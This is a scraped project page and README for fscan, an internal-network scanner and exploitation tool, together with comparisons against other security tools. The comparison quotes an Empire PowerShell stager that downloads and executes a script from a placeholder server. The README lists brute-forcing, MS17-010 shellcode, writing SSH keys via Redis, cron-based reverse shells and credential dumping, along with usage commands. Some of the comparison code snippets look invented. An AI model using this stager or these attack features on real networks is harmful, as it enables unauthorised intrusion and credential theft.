Convert Figma logo to code with AI

shadow1ng logofscan

一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。

11,780
1,709
11,780
70
View on GitHub

Top Related Projects

projectdiscovery's avatar

nuclei

21,863

Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps you find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.

nmap's avatar

nmap

10,944

Nmap - the Network Mapper. Github mirror of official SVN repository.

robertdavidgraham's avatar

masscan

24,225

TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.

michenriksen's avatar

aquatone

5,696

A Tool for Domain Flyovers

EmpireProject's avatar

Empire

7,568

Empire is a PowerShell and Python post-exploitation agent.

laramies's avatar

theHarvester

12,453

E-mails, subdomains and names Harvester - OSINT

Quick Overview

fscan is an internal network scanning tool designed for penetration testing and security assessments. It combines multiple functionalities such as port scanning, service detection, brute-force attacks, and vulnerability exploitation into a single, efficient tool. The project aims to simplify and streamline the process of internal network reconnaissance and vulnerability discovery.

Pros

  • All-in-one solution for internal network scanning and exploitation
  • Fast and efficient, utilizing concurrent scanning techniques
  • Regularly updated with new features and vulnerability checks
  • Cross-platform support (Windows, Linux, Mac)

Cons

  • Potential for misuse if not handled responsibly
  • May trigger antivirus or intrusion detection systems
  • Limited documentation, especially for advanced features
  • Some features may require additional dependencies or configurations

Getting Started

To get started with fscan:

  1. Download the latest release from the GitHub repository.
  2. Extract the executable for your operating system.
  3. Open a terminal or command prompt and navigate to the directory containing the fscan executable.
  4. Run fscan with desired options:
# Basic scan of a single IP
./fscan -h 192.168.1.1

# Scan a network range with common ports
./fscan -h 192.168.1.1/24 -p 80,443,3306,3389,5432,6379,9200,11211,27017

# Full scan with all modules enabled
./fscan -h 192.168.1.1/24 -p 1-65535 -ap 1-65535 -vv -o results.txt

For more advanced usage and options, refer to the project's README and documentation on the GitHub repository.

Competitor Comparisons

projectdiscovery logo

nuclei

21,863

Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps you find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.

Pros of Nuclei

  • More extensive and customizable scanning capabilities with a large library of templates
  • Active community development and regular updates
  • Better documentation and integration with other security tools

Cons of Nuclei

  • Steeper learning curve due to its more complex template system
  • Potentially slower scanning speed for basic tasks compared to Fscan's lightweight approach

Code Comparison

Fscan (basic port scanning):

func ScanPort(ip string, port int) {
    address := fmt.Sprintf("%s:%d", ip, port)
    conn, err := net.DialTimeout("tcp", address, time.Second*2)
    if err == nil {
        conn.Close()
        fmt.Printf("Port %d is open\n", port)
    }
}

Nuclei (template-based scanning):

id: example-scan
info:
  name: Example Scan
  severity: info
requests:
  - method: GET
    path:
      - "{{BaseURL}}/example"
    matchers:
      - type: word
        words:
          - "Example Response"

The code comparison highlights the different approaches: Fscan uses direct Go code for basic port scanning, while Nuclei employs YAML-based templates for more flexible and customizable scans.

nmap logo

nmap

10,944

Nmap - the Network Mapper. Github mirror of official SVN repository.

Pros of nmap

  • Extensive feature set and flexibility for network scanning and discovery
  • Large, active community and ongoing development
  • Well-documented with comprehensive man pages and online resources

Cons of nmap

  • Steeper learning curve for beginners
  • Can be slower for large-scale scans compared to more specialized tools
  • Requires root/admin privileges for many scan types

Code comparison

nmap:

nmap -sV -sC -p- 192.168.1.0/24

fscan:

fscan.exe -h 192.168.1.1/24 -p 1-65535

Both tools allow for network scanning, but nmap offers more granular control over scan types and options, while fscan provides a simpler syntax for quick scans.

nmap is a comprehensive, well-established network scanning and discovery tool with a wide range of features and customization options. It's ideal for detailed network analysis and security assessments but may require more time to master.

fscan is a lightweight, fast scanner written in Go, designed for internal network scanning. It's easier to use for basic scans and may be quicker for large-scale scans, but lacks some of the advanced features and flexibility of nmap.

Choose nmap for in-depth network analysis and security testing, or fscan for quick and simple internal network scans.

robertdavidgraham logo

masscan

24,225

TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.

Pros of masscan

  • Extremely fast scanning capabilities, able to scan the entire Internet in under 6 minutes
  • Written in C, offering high performance and low-level control
  • Supports a wide range of scanning options and customization

Cons of masscan

  • Primarily focused on port scanning, lacking the broader functionality of fscan
  • May require more technical expertise to use effectively
  • Less actively maintained, with fewer recent updates compared to fscan

Code Comparison

masscan (C):

int
proto_banner1_tcp(
    struct Banner1 *banner1,
    struct ProtocolState *pstate,
    const unsigned char *px, size_t length,
    struct BannerOutput *banout,
    struct InteractiveData *more)
{
    // TCP protocol handling code
}

fscan (Go):

func (s *Scanner) TCPScan(ip string, port int, service string) {
    conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", ip, port), s.Timeout)
    if err != nil {
        return
    }
    defer conn.Close()
    // Further scanning logic
}

The code snippets demonstrate the different approaches and languages used by each project. masscan's C implementation offers low-level control, while fscan's Go code provides a more high-level and readable structure.

michenriksen logo

aquatone

5,696

A Tool for Domain Flyovers

Pros of Aquatone

  • Specialized in web-based reconnaissance and screenshot capture
  • Supports multiple input formats (URLs, Nmap XML, text files)
  • Generates comprehensive HTML reports with screenshots and clustering

Cons of Aquatone

  • Limited to web-based targets and doesn't perform broader network scanning
  • Requires external tools for full functionality (e.g., ChromeDriver)
  • Less actively maintained compared to Fscan

Code Comparison

Fscan (Go):

func (s *Scanner) TCPScan(ip string, port int) {
    conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", ip, port), time.Duration(s.Timeout)*time.Second)
    if err == nil {
        conn.Close()
        s.AddResult(ip, port, "open")
    }
}

Aquatone (Ruby):

def capture_screenshot(url, output_file)
  browser.navigate.to(url)
  browser.save_screenshot(output_file)
rescue => e
  @logger.error("Error capturing screenshot of #{url}: #{e}")
end

The code snippets highlight the different focus areas of each tool. Fscan performs TCP port scanning, while Aquatone captures web screenshots using a browser automation tool.

EmpireProject logo

Empire

7,568

Empire is a PowerShell and Python post-exploitation agent.

Pros of Empire

  • More comprehensive post-exploitation framework with extensive modules
  • Active community and regular updates
  • Supports multiple communication protocols for C2

Cons of Empire

  • Larger footprint and more complex to set up and use
  • Higher likelihood of detection due to its popularity
  • Requires more resources to run effectively

Code Comparison

Empire (PowerShell stager):

$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;IEX $wc.DownloadString("http://empire.server/launcher");

fscan (Go scanner function):

func (s *Scanner) ScanPort(ip string, port int) (result string, err error) {
    conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", ip, port), time.Duration(s.Timeout)*time.Second)
    if err != nil {
        return "", err
    }
    defer conn.Close()
    return fmt.Sprintf("%s:%d open", ip, port), nil
}

Summary

Empire is a more comprehensive post-exploitation framework with extensive capabilities, while fscan is a lightweight, focused network scanner. Empire offers more features but is more complex, while fscan is simpler and easier to use for specific scanning tasks. The choice between them depends on the specific requirements of the security assessment or penetration testing scenario.

laramies logo

theHarvester

12,453

E-mails, subdomains and names Harvester - OSINT

Pros of theHarvester

  • More comprehensive OSINT gathering capabilities, including email harvesting and domain information collection
  • Supports a wider range of search engines and data sources
  • Actively maintained with regular updates and contributions from the community

Cons of theHarvester

  • Primarily focused on information gathering, lacking the extensive vulnerability scanning features of fscan
  • May require additional tools for a complete security assessment
  • Can be slower when performing extensive searches across multiple data sources

Code Comparison

theHarvester:

from theHarvester.lib.core import *
from theHarvester.discovery import *

search = googlesearch.search_google(word, limit, start)
search.process()
emails = search.get_emails()

fscan:

func (s *Scanner) TCPScan(ip string, ports []int) {
    for _, port := range ports {
        s.ScanPort(ip, port)
    }
}

The code snippets highlight the different focus areas of each tool. theHarvester emphasizes OSINT gathering through search engines, while fscan concentrates on network scanning and vulnerability assessment.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Fscan 2.0.0

English

0x00 新增功能

1、UI/UX 优化

2、增加修改-f -o参数,-f支持txt/csv/json,输出格式优化

3、增加端口指纹识别功能。

4、增加本地信息搜集模块,增加本地域控探测模块,增加本地Minidump模块

5、增加Telnet、VNC、Elasticsearch、RabbitMQ、Kafka、ActiveMQ、LDAP、SMTP、IMAP、POP3、SNMP、Zabbix、Modbus、Rsync、Cassandra、Neo4j扫描。

6、架构重构,以反射+插件模块构建

7、增加-log参数,支持INFO,SUCCESS、ERROR、DEBUG参数,用于调试具体信息。

8、优化线程,现在会以更好的多线程运行

新版由于对旧版代码进行了全面的重构,难免会有Bug,请在遇到Bug时提交Issue,会尽快修复处理,感谢。

欢迎提交新的插件模块,目前插件为快速热插拔形式,适用于简易开发。

0x01 简介

一款功能丰富的内网综合扫描工具,提供一键自动化、全方位的漏洞扫描能力。

主要功能

  • 主机存活探测:快速识别内网中的活跃主机
  • 端口扫描:全面检测目标主机开放端口
  • 服务爆破:支持对常见服务进行密码爆破测试
  • 漏洞利用:集成MS17-010等高危漏洞检测
  • Redis利用:支持批量写入公钥进行权限获取
  • 系统信息收集:可读取Windows网卡信息
  • Web应用检测:
    • Web指纹识别
    • Web漏洞扫描
  • 域环境探测:
    • NetBIOS信息获取
    • 域控制器识别
  • 后渗透功能:支持通过计划任务实现反弹shell

0x02 主要功能

1. 信息搜集

  • 基于ICMP的主机存活探测:快速识别网络中的活跃主机设备
  • 全面的端口扫描:系统地检测目标主机的开放端口情况

2. 爆破功能

  • 常用服务密码爆破:支持SSH、SMB、RDP等多种协议的身份认证测试
  • 数据库密码爆破:覆盖MySQL、MSSQL、Redis、PostgreSQL、Oracle等主流数据库系统

3. 系统信息与漏洞扫描

  • 网络信息收集:包括NetBIOS探测和域控制器识别
  • 系统信息获取:能够读取目标系统网卡配置信息
  • 安全漏洞检测:支持MS17-010等高危漏洞的识别与检测

4. Web应用探测

  • 网站信息收集:自动获取网站标题信息
  • Web指纹识别:可识别常见CMS系统与OA框架
  • 漏洞扫描能力:集成WebLogic、Struts2等漏洞检测,兼容XRay POC

5. 漏洞利用模块

  • Redis利用:支持写入公钥或植入计划任务
  • SSH远程执行:提供SSH命令执行功能
  • MS17-010利用:支持ShellCode注入,可实现添加用户等操作

6. 辅助功能

  • 扫描结果存储:将所有检测结果保存至文件,便于后续分析

0x03 使用说明

基础扫描配置

以下参数由于重构原因并不能保证每一个参数都可以正常运行,出现问题请及时提交Issue。

目标配置

-h      指定目标(支持格式:192.168.1.1/24, 192.168.1.1-255, 192.168.1.1,192.168.1.2)
-eh     排除特定目标
-hf     从文件导入目标

端口配置

-p      指定端口范围(默认常用端口),如: -p 22,80,3306 或 -p 1-65535
-portf  从文件导入端口列表

认证配置

用户名密码

-user   指定用户名
-pwd    指定密码
-userf  用户名字典文件
-pwdf   密码字典文件
-usera  添加额外用户名
-pwda   添加额外密码
-domain 指定域名

SSH相关

-sshkey SSH私钥路径
-c      SSH连接后执行的命令

扫描控制

扫描模式

-m      指定扫描模式(默认为All)
-t      线程数(默认60)
-time   超时时间(默认3秒)
-top    存活检测结果展示数量(默认10)
-np     跳过存活检测
-ping   使用ping代替ICMP
-skip   跳过指纹识别

Web扫描配置

-u      指定单个URL扫描
-uf     从文件导入URL列表
-cookie 设置Cookie
-wt     Web请求超时时间(默认5秒)

代理设置

-proxy  HTTP代理(如: http://127.0.0.1:8080)
-socks5 SOCKS5代理(如: 127.0.0.1:1080)

POC扫描配置

-pocpath POC文件路径
-pocname 指定POC名称
-full    启用完整POC扫描
-dns     启用DNS日志
-num     POC并发数(默认20)

Redis利用配置

-rf      Redis文件名
-rs      Redis Shell配置
-noredis 禁用Redis检测

输出控制

-o       输出文件路径(默认关闭)
-f       输出格式(默认txt)
-no      禁用结果保存
-silent  静默模式
-nocolor 禁用彩色输出
-json    JSON格式输出
-log     日志级别设置
-pg      显示扫描进度条

其他配置

-local   本地模式
-nobr    禁用暴力破解
-retry   最大重试次数(默认3次)
-path    远程路径配置
-hash    哈希值
-hashf   哈希文件
-sc      Shellcode配置
-wmi     启用WMI
-lang    语言设置(默认zh)

以上参数由于重构原因并不能保证每一个参数都可以正常运行,出现问题请及时提交Issue。

编译说明

# 基础编译
go build -ldflags="-s -w" -trimpath main.go

# UPX压缩(可选)
upx -9 fscan

系统安装

# Arch Linux
yay -S fscan-git
# 或
paru -S fscan-git

0x04 运行截图

fscan.exe -h 192.168.x.x (全功能、ms17010、读取网卡信息)

fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)

fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)

fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc

fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)

go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)

go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量) img.png

新的展示

2.0-1

2.0-2

0x05 免责声明

本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。

为避免被恶意使用,本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。

在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。

如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。

在安装并使用本工具前,请您务必审慎阅读、充分理解各条款内容,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。

除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。

0x06 404StarLink 2.0 - Galaxy

fscan 是 404Team 星链计划2.0 中的一环,如果对fscan 有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。

演示视频【安全工具】5大功能,一键化内网扫描神器——404星链计划fscan

0x07 安全培训

img.png 学网络安全,就选玲珑安全!专业漏洞挖掘,精准定位风险;助力技能提升,塑造安全精英;玲珑安全,为您的数字世界保驾护航!
在线免费学习网络安全,涵盖src漏洞挖掘,0基础安全入门。适用于小白,进阶,高手: https://space.bilibili.com/602205041
玲珑安全往期学员报喜🎉: https://www.ifhsec.com/list.html
玲珑安全漏洞挖掘培训学习联系微信: linglongsec

0x08 Star Chart

Stargazers over time

0x09 捐赠

如果你觉得这个项目对你有帮助,你可以请作者喝饮料🍹 点我

0x10 参考链接

https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc

0x11 最近更新

2025 更新

  • 添加插件

2024 更新

  • 2024/12/19: v2.0.0 重大更新
    • 完整代码重构,提升性能和可维护性
    • 重新设计模块化架构,支持插件扩展
    • 改进并发控制,提升扫描效率

2023 更新

  • 2023/11/13:
    • 新增控制台颜色输出(可用 -nocolor 关闭)
    • 支持JSON格式保存结果(-json)
    • 调整TLS最低版本至1.0
    • 支持端口分组(-p db,web,service)

2022 更新

  • 2022/11/19: 新增hash碰撞和wmiexec无回显命令执行功能
  • 2022/7/14: 改进文件导入支持和搜索匹配功能
  • 2022/7/6: 优化内存管理,扩展URL支持
  • 2022/7/2:
    • 增强POC fuzz模块
    • 新增MS17017利用功能
    • 加入socks5代理支持
  • 2022/4/20: 新增POC路径指定和端口文件导入功能
  • 2022/2/25: 新增webonly模式(致谢 @AgeloVito)
  • 2022/1/11: 新增Oracle密码爆破
  • 2022/1/7: 改进大规模网段扫描,新增LiveTop功能

2021 更新

  • 2021/12/7: 新增RDP扫描功能
  • 2021/12/1: 全面优化功能模块
  • 2021/6/18: 改进POC识别机制
  • 2021/5/29: 新增FCGI未授权扫描
  • 2021/5/15: 发布Windows 2003版本
  • 2021/5/6: 更新核心模块
  • 2021/4/21: 加入NetBIOS探测和域控识别
  • 2021/3/4: 支持URL批量扫描
  • 2021/2/25: 支持密码爆破功能
  • 2021/2/8: 新增指纹识别功能
  • 2021/2/5: 优化ICMP探测

2020 更新

  • 2020/12/12: 集成YAML解析引擎,支持XRay POC
  • 2020/12/6: 优化ICMP模块
  • 2020/12/03: 改进IP段处理
  • 2020/11/17: 新增WebScan模块
  • 2020/11/16: 优化ICMP模块
  • 2020/11/15: 支持文件导入IP

感谢所有为项目做出贡献的开发è€